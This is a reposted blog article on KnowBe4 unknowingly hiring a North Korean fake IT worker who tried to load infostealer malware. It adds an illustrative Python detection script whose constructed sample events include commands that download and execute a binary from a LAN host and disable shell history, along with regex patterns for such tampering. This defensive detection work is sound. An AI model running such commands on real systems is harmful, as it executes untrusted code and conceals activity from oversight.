
KnowBe4 Stops Insider Threat

Written on: Jul 29, 2024 3:28:43 PM

Written by: Dylan Swain

Topics: COOLSPIRiT, KnowBe4

One of our partners, KnowBe4, recently stopped an attempted attack by a North Korean operative posing as a remote IT worker. Their experience gives valuable insight into how these attacks work and will help your organisation recognise them before they become an issue.

 

Incident Report Summary: Insider Threat

First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems. This is not a data breach notification; there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don't let it happen to you. Story updated 7/27/2024.

TL;DR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware.

Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI "enhanced". 

The EDR software detected it and alerted our InfoSec Security Operations Center. The SOC called the new hire and asked if they could help. That's when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation.

SUMMARY: This report covers the investigation of Employee ID: XXXX, hired as a Principal Software Engineer. On July 15, 2024, a series of suspicious activities were detected on that user account. Based on the SOC team's evaluation of the activities, it was found that this may have been intentional on the user's part, and he was suspected of being an insider threat/nation-state actor. Upon initial investigation and containment of the host, a more detailed inquiry into the new hire took place.

On July 15, 2024, a series of suspicious activities were detected on the user beginning at 9:55pm EST. When these alerts came in, KnowBe4's SOC team reached out to the user to inquire about the anomalous activity and its possible cause. XXXX responded to the SOC that he was following steps in his router guide to troubleshoot a speed issue and that this may have caused a compromise.

The attacker performed various actions to manipulate session history files, transfer potentially harmful files, and execute unauthorized software. He used a Raspberry Pi to download the malware. The SOC attempted to get more details from XXXX, including getting him on a call. XXXX stated he was unavailable for a call and later became unresponsive. At around 10:20pm EST, the SOC contained XXXX's device.

How this works is that the fake worker asks to have their workstation sent to an address that is basically an "IT mule laptop farm". They then VPN in from where they really physically are (North Korea or over the border in China) and work the night shift so that they seem to be working in US daytime. The scam is that they are actually doing the work, getting paid well, and give a large amount to North Korea to fund its illegal programs. I don't have to tell you about the severe risk of this. It's good that we keep new employees in a highly restricted area when they start, with no access to production systems. Our controls caught it, but that was sure a learning moment that I am happy to share with everyone.

TIPS TO PREVENT THIS 

  • Scan your remote devices to make sure no one remotes into them.
  • Better vetting, making sure that they are physically where they are supposed to be.
  • Better resume scanning for career inconsistencies.
  • Get these people on video camera and ask them about the work they are doing.
  • The laptop's shipping address different from where they are supposed to live/work is a red flag.

RECOMMENDED PROCESS IMPROVEMENT

  • Background check appears inadequate. Names used were not consistent.
  • References potentially not properly vetted. Do not rely on email references only.
  • Implement enhanced monitoring for any continued attempts to access systems.
  • Review and strengthen access controls and authentication processes.
  • Conduct security awareness training for employees, emphasizing social engineering tactics.

WHAT TO LOOK OUT FOR:

  • Use of VOIP numbers and lack of digital footprint for provided contact information
  • Discrepancies in address and date of birth across different sources
  • Conflicting personal information (marital status, "family emergencies" explaining unavailability)
  • Sophisticated use of VPNs or VMs for accessing company systems
  • Attempt to execute malware and subsequent cover-up efforts

ALERT HR ABOUT:

The subject has demonstrated a high level of sophistication in creating a believable cover identity, exploiting weaknesses in the hiring and background check processes, and attempting to establish a foothold within the organization's systems.

This is a well-organized, state-sponsored, large criminal ring with extensive resources. The case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats. Left is the original stock picture. Right is the AI fake submitted to HR.

[Image: the original stock photograph (left) and the AI-altered photograph submitted to HR (right)]

Credit: Stu Sjouwerman | Original Blog
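The behaviours the report describes (activity outside the employee's declared working hours, tampering with shell history files, fetching a file from a LAN host such as a Raspberry Pi and then executing it, all on an account that has not finished onboarding) can be expressed as a small triage rule that a SOC can run over endpoint telemetry. What follows is an added example and is not KnowBe4's tooling or code from the original post; the event shape, the user IDs, the hire roster and every telemetry line are constructed for illustration, and a real EDR export would need its own parser. It goes slightly beyond the narrative by also catching the common history-clearing commands, not only the history file write mentioned in the report.

```python
"""Triage endpoint events against a new-hire roster.

Added example, not KnowBe4 tooling or code from the original post. The event
shape, user IDs, roster and telemetry lines below are constructed for
illustration; a real EDR export needs its own parser.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed roster (hypothetical). onboarding_done=False means the account
# should still be confined to the onboarding app set (mail, chat, video).
NEW_HIRES = {
    "emp_xxxx": {"hired": "2024-07-10", "home_tz_offset": -4, "onboarding_done": False},
    "emp_1234": {"hired": "2024-05-01", "home_tz_offset": -7, "onboarding_done": True},
}

# Constructed EDR-style events with UTC timestamps. Not real telemetry.
EVENTS = [
    {"ts": "2024-07-16T01:55:00Z", "user": "emp_xxxx", "type": "process",
     "cmd": "curl -o /tmp/update.bin http://192.168.1.23:8000/update.bin"},
    {"ts": "2024-07-16T01:56:10Z", "user": "emp_xxxx", "type": "process",
     "cmd": "chmod +x /tmp/update.bin && /tmp/update.bin"},
    {"ts": "2024-07-16T01:57:30Z", "user": "emp_xxxx", "type": "file_write",
     "path": "/Users/xxxx/.zsh_history"},
    {"ts": "2024-07-16T01:58:00Z", "user": "emp_xxxx", "type": "process",
     "cmd": "export HISTFILE=/dev/null"},
    {"ts": "2024-07-15T17:05:00Z", "user": "emp_1234", "type": "process",
     "cmd": "git pull"},
]

HISTORY_FILES = (".zsh_history", ".bash_history", ".zsh_sessions")
HISTORY_TAMPER = re.compile(r"history\s+-c|HISTFILE=|HISTSIZE=0|unset\s+HISTFILE")
# Matches "curl|wget -o <path> ... http://<ipv4>"; argument order is fixed for the demo.
FETCH = re.compile(r"\b(?:curl|wget)\b.*?(?:-o|-O|--output)\s+(\S+).*?https?://([0-9.]+)")
WORK_START, WORK_END = 7, 20  # local hours treated as normal for this roster


def local_hour(ts_utc, offset_hours):
    """Hour of day in the employee's declared home time zone."""
    t = datetime.fromisoformat(ts_utc.replace("Z", "+00:00"))
    return (t + timedelta(hours=offset_hours)).hour


def is_private(host):
    """True for RFC 1918 / loopback / link-local addresses; False if unparsable."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def triage(events, hires):
    """Return {user: {tag: first_evidence}} for users present in the roster."""
    findings = {u: {} for u in hires}
    downloaded = {}  # user -> set of local paths fetched from a private address
    for ev in sorted(events, key=lambda e: e["ts"]):
        user = ev["user"]
        if user not in hires:
            continue
        out, cmd = findings[user], ev.get("cmd", "")
        hour = local_hour(ev["ts"], hires[user]["home_tz_offset"])
        if hour < WORK_START or hour >= WORK_END:
            out.setdefault("off_hours_activity", ev["ts"])
        if ev["type"] == "file_write" and ev["path"].endswith(HISTORY_FILES):
            out.setdefault("history_file_modified", ev["path"])
        if HISTORY_TAMPER.search(cmd):
            out.setdefault("history_tamper_command", cmd)
        m = FETCH.search(cmd)
        if m and is_private(m.group(2)):
            downloaded.setdefault(user, set()).add(m.group(1))
            out.setdefault("lan_download", m.group(2))
        elif ev["type"] == "process":
            # A file pulled from the LAN earlier is now being run.
            for path in downloaded.get(user, ()):
                if path in cmd:
                    out.setdefault("lan_download_executed", path)
    return findings


def prioritize(findings, hires):
    """Rank users by number of distinct findings. An account still in
    onboarding gets extra weight: it should have nothing to do on the
    host but training, so any of these behaviours is out of place."""
    ranked = []
    for user, tags in findings.items():
        score = len(tags)
        if score and not hires[user]["onboarding_done"]:
            score += 2
        ranked.append((user, score, sorted(tags)))
    return sorted(ranked, key=lambda r: -r[1])


if __name__ == "__main__":
    for user, score, tags in prioritize(triage(EVENTS, NEW_HIRES), NEW_HIRES):
        print(f"{user}: score={score} {tags}")
```

The roster join is the part that matters: the same four events from a long-tenured engineer at 10am local time would be worth a look, but from an account that is still inside onboarding, at 10pm in its declared home time zone, they are the signal the SOC acted on here. Thresholds such as the working-hour window and the onboarding weight are illustrative and should be tuned to your own environment.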

 
Frequently Asked Questions About KnowBe4's Fake IT Worker Blog
 
On July 23, 2024, I wrote a blog post about how KnowBe4 inadvertently hired a skillful North Korean IT worker who used the stolen identity of a US citizen. He participated in several rounds of video interviews and circumvented background check processes commonly used. Updated 7/27/2024.
 
The intent was to share an organizational learning moment, so you can make sure this does not happen to you. The story went viral, which is exactly what I had hoped for, but the press coverage was uneven. Do we have egg on our face? Yes. And I am sharing that lesson with you. It's why I started KnowBe4 in 2010. In 2024 our mission is more important than ever. 
 
Q1: Was any KnowBe4 system breached in this North Korean IT worker incident?
No. KnowBe4 was not breached. When we hire new employees, their user account is granted only limited permissions that allow them to proceed through our new hire onboarding process and training. They can access only a minimal number of necessary apps to go through our new employee training.
 
Q2: What access do new employees get? 
These are apps such as their email inbox, Slack, and Zoom. The workstation they receive is locked down and has no data residing on it; it is essentially a laptop with nothing on it except our endpoint security and management tools.
 
Q3: Did the new employee get access to customer data? 
No. This person never had access to any customer data, KnowBe4's private networks, cloud infrastructure, code, or any KnowBe4 confidential information. They had basic communication apps and a factory-new provisioned laptop. We detected suspicious activity and responded within minutes, quarantining the entire laptop. 
 
Q4: Was any malware executed on the machine? 
No. No malware was executed on the machine as it was blocked by our security tooling. A complete review of all processes, commands, network connections, and other activity on the laptop was conducted and we concluded that no further action was needed as there was no suspicious activity outside of what was detected and blocked.
 
Q5: What access did this worker have on his workstation that could have compromised customer data or perhaps used the simulated phishing platform?
There was nothing provided on the laptop. All KnowBe4 data is kept in the cloud, and a review of this individual's user account determined they did not access anything other than their own email inbox. We provision access to our KnowBe4 platform through Okta. New hires are not granted access to the KnowBe4 platform until after completion of their onboarding, which this person had not completed, and therefore they never had access to the platform.
 
Q6: Why would someone hired as a software developer try to load malware on their new machine? 
We can only guess, but the malware was an infostealer targeting data stored on web browsers, and perhaps he was hoping to extract information left on the computer before it was commissioned to him.
 
Q7: How did this bad actor pass your hiring process?
This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a US citizen, who participated in several rounds of video interviews and circumvented the background check processes commonly used by companies.
 
Q8: The press made it sound like a data breach disclosure. Was it? 
No. It was a Public Service Announcement. We could have kept quiet while wiping the egg off our face. However, our mission is to make the world aware of cybercrime. If something like this can happen to us, it can happen to almost anyone. The blog post was meant to warn organizations about this particular danger. It looks like we have succeeded.
 
Q9: Has KnowBe4 changed their hiring process? 
You bet we have! Several process changes were made so that this thing will be caught earlier. One example is that in the US we will only ship new employee workstations to a nearby UPS shop and require a picture ID.
 
Q10: How can I learn more about this particular risk? 
On the blog post at the end, we link to a podcast from Mandiant where they go in depth about this particular danger. I strongly recommend you listen to it. The U.S. Government is aware of this threat and has been warning against it since 2022. Here is the link!
 
Q11: How has the press been covering this? 
Uneven. Many technical media outlets have been cool, calm and collected, considered this a great cautionary tale, and appreciated us being transparent. Other outlets took the "If it bleeds, it leads" sensational angle. They turned it into "data breach" clickbait and only casually mentioned at the end that no harm was done.

 

Credit: Stu Sjouwerman | Original Blog
